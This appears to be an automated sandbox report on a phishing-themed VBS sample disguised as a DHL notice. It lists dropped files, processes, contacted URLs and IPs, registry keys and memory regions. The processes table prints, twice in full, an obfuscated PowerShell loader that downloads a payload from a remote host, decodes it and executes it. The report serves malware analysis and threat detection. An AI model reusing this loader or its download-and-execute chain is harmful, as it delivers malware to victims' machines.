Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL_RF_20200712_BN_N0095673441.vbs
|
ASCII text, with very long lines (604), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baqxzscp.zid.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fteeovzp.5pn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrsca1lt.bks.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp5pqg1d.kqs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Luminescences.ska
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping google.com -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function
Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel;
$Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function
Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul
ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla.
top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce
Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo
BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh.
';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD
ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat
';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL
Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic
.iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm
UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ
ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT
.aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad
SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin
');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs
Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN
egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll
ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn
rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168
'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$
UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt
nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen
(Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT
,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim
');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr
sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl
R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl
-AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ')
;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb
mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor
LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen
(Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor
beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d
depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl
Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm
Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer
langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa
');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er
St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi
eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C
angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat
woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext
BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3
Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function
Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel;
$Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function
Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul
ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla.
top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce
Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo
BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh.
';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD
ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat
';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL
Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic
.iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm
UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ
ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT
.aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad
SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin
');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs
Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN
egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll
ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn
rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168
'CacoxPLatche JordlSilvasSt.lavulselrsvippkKoder. KyllDOpry o F,brw evisnStemmlEvapooCenteaJob udobfusFBohavi Melkl amseepunkt(Su.pr$
UsliFFremmo ortrJagttuI depnViderdAnensebathon OphodPreapeBaddesParti7Ra,df9Caust,Un.us$va teUSkrppdDe aif Del aKvat.k Skllt
nor uWh,lar Svine.aporrTectoeAngaksSttt.) agis ';$Prostatectomy=$Femogtyvende[1]+$Prostatectomy;$Udfaktureres=$Femogtyvende[0];Halvkusinen
(Posthoc168 'For,t$SodavgSincelHealdoM.rmebB arbaDevoclTrans:ExitiPCurieaRrpospModvipbagtaeL.courDiasts Mome=Glets( Ma,oT
,iree,uculs .epitMikro-Ve.zePBelloaAnamnt stroh P.ly Bur $ForstUBevged Abjuf P.shaMam.lkStepptHastiuPolicr Bl,deKvabtr IkoneT,ykssDelpr)Bulim
');while (!$Pappers) {Halvkusinen (Posthoc168 'Explo$U,congRecomlResheoForpabWitheaWakfblShaik:FniseASlutsdDr,err StaviKo.fraSyfiltGr
sei Mcnac St,i=Vexat$Bowlit .utcrnjereuA,steeRefor ') ;Halvkusinen $Prostatectomy;Halvkusinen (Posthoc168 ' OutpShjisotTrineaPrionrTranstxanth-StearSFootllOplage.ubcoeYd,evpWorl
R neb4Autom ');Halvkusinen (Posthoc168 'Yuruc$NonchgKar elGjaldo yvabskaglaBil.ylMatte:SphegP spanaUddykpInfr,pnegate t,nkrFeriesB.nkr=Koffa(MolteTBa,kaeUnsp.sMinuttGryl
-AdsorPSubtia enlt JagthMurst Vands$SolbaUoctard,oilefRotatablnddkFigent,accau MisarIberie edurStoreeLiv.fsUnplu)Yorks ')
;Halvkusinen (Posthoc168 'Petey$ G,nngSknsalT,llgo Lewdb ForeaeraselTag i:Ga.glCOveraoMul,iiFo fasMisdat in ir Jug.eSkppelGaransmedic=Undis$MarmigOvermlFlankoForudb
mus,a.eserlChief:RefleS.egynkFllesrdsiockForhaiFede.n Nonpd KrsejKl jna Bu.sgG.rmae OpernSkenddNimsheButik+Salth+ ragt%Aroma$BeretTAalbor
LinieInt.rdJuleseLambelGla,etI,dekeOriensOrang2Tense0 Tyro.BevikcTelefoKurveuCo,pun ReprtUbeha ') ;$Forundendes79=$Tredeltes20[$Coistrels];}Halvkusinen
(Posthoc168 'Tim.r$ ErhvgFaarelWepmaoSpo.ibdamp.aVand lParag:.nchhE.ndesgTa.leo perstSmaadrRevoliAfskepTrumfpBea ueBadedrUndernFor
beT emi7 Ta t4Stric ,verv=insou Frs,G SmrbeDamprtLa.kn-underC,isiooSmeltn Verst AceteSculpnSjleat d,ct Tilsy$M.nsuUCoel.d
depofEscudaSaddlkKa yotRituauFrostr IndeeCykelrMofuseOplyssGeote ');Halvkusinen (Posthoc168 'N.nag$ExpelgDriftlBejaboEnajibHelteaHovedl
Spec:OvertU KbesnBagdel,illiaGingeb Trucoe rovrDef.naPostibAb eslEkstre P.el B.ann= Chel Rusf[Ulv,mSSelskyKngtesAlbantPynteeSivebm
Egot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer
langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttefeArbejrAlbugnBouileRhy,o7 Mote4Sp,ba) Traa
');Halvkusinen (Posthoc168 ' Tilb$Mi,jbgMartelDustpoBekenb,peraaMeratlRiffe:P enoGOuthueRegnmmLika,iTitantNonreoGobblrCykeliKvderaFo,holOr.er
St,er=Lnmo. Udrug[ ManaSCoalsyA iensp.cistSpinne KravmVestl.Souh TGldsbeScallxDarkitYpper. plauEGennenEftercHyp.koInferdSpi
eiStrygnVade.gAnne.]Candi: Lovf: MiniA LyslSSkjolC ,orsIEjakuI Arch.SuperGMorkieDagvrtCruceS.igortSuperr S,eri oastnLootegAnker(It.ne$C
angU onflnKashal UnglaTilsab MaaloUdnvnrGuan,aHemlobSolvelSakseeOleog)Blikv ');Halvkusinen (Posthoc168 'Anlac$EkspogConfilGat
woBladsbFrdigaTandhlK.ltu:T,dstTD,flur .ropsdeba.kRimesoSpintm Reala .medgEnsafeCh.derBor le El cnOv.rd=Ora.g$CaeciG PseueKan,nmevaneiPreext
BadgoThaierSpgeniKultuaOctavlOmlss.,rodusStjgeu ,eribTogl,s Udbytdukk r,depuiBaandnPyromgEuroe(unbeh3 Mont0Vacci3M,deb4Blond2Nesto3
Sneg, unde2Cliff9.stro4Recep2Unsto8 L ve).amme ');Halvkusinen $Trskomageren;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.12.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://mnajjar.de/vsp1/Duplo.msoP
|
unknown
|
||
|
http://mnajjar.de/vsp1/Duplo.msoXR
|
unknown
|
||
|
http://mnajjar.de
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://aka.ms/pscore6lBdq
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://mnajjar.de/vsp/izoOgnnlVO233.bin
|
148.163.99.20
|
||
|
http://mnajjar.de/vsp1/Duplo.mso
|
148.163.99.20
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
concaribe.com
|
192.185.13.234
|
|
|
|
ftp.concaribe.com
|
unknown
|
|
|
|
google.com
|
172.217.165.142
|
||
|
api.ipify.org
|
104.26.12.205
|
||
|
mnajjar.de
|
148.163.99.20
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.185.13.234
|
concaribe.com
|
United States
|
|
|
|
104.26.12.205
|
api.ipify.org
|
United States
|
||
|
148.163.99.20
|
mnajjar.de
|
United States
|
||
|
172.217.165.142
|
google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3D44000
|
remote allocation
|
page execute and read and write
|
|
|
|
245EB000
|
trusted library allocation
|
page read and write
|
|
|
|
63C4000
|
trusted library allocation
|
page read and write
|
|
|
|
96F4000
|
direct allocation
|
page execute and read and write
|
|
|
|
1B6D16B3000
|
trusted library allocation
|
page read and write
|
|
|
|
245C1000
|
trusted library allocation
|
page read and write
|
|
|
|
7520000
|
direct allocation
|
page execute and read and write
|
|
|
|
4FD5000
|
heap
|
page execute and read and write
|
||
|
5A42000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
8F6F000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
8009AFE000
|
stack
|
page read and write
|
||
|
8CC0000
|
direct allocation
|
page read and write
|
||
|
7EAB000
|
stack
|
page read and write
|
||
|
8D30000
|
direct allocation
|
page read and write
|
||
|
6111000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
8CB2000
|
heap
|
page read and write
|
||
|
274B0000
|
trusted library allocation
|
page read and write
|
||
|
2746E000
|
stack
|
page read and write
|
||
|
26578000
|
trusted library allocation
|
page read and write
|
||
|
7BBE000
|
heap
|
page read and write
|
||
|
2664C000
|
stack
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
1CF47632000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
244AE000
|
stack
|
page read and write
|
||
|
1B6D164F000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
2669B000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
5111000
|
trusted library allocation
|
page read and write
|
||
|
244E0000
|
heap
|
page execute and read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
2674B000
|
stack
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4582A000
|
heap
|
page read and write
|
||
|
8B05000
|
trusted library allocation
|
page read and write
|
||
|
1CF458AA000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47680000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
1CF47652000
|
heap
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
1CF4764A000
|
heap
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
8E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page read and write
|
||
|
57C5000
|
trusted library allocation
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
269F2000
|
heap
|
page read and write
|
||
|
1CF47942000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB98000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
8BCE000
|
stack
|
page read and write
|
||
|
1B6BFBBF000
|
heap
|
page read and write
|
||
|
266B1000
|
trusted library allocation
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
26DE0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4793C000
|
heap
|
page read and write
|
||
|
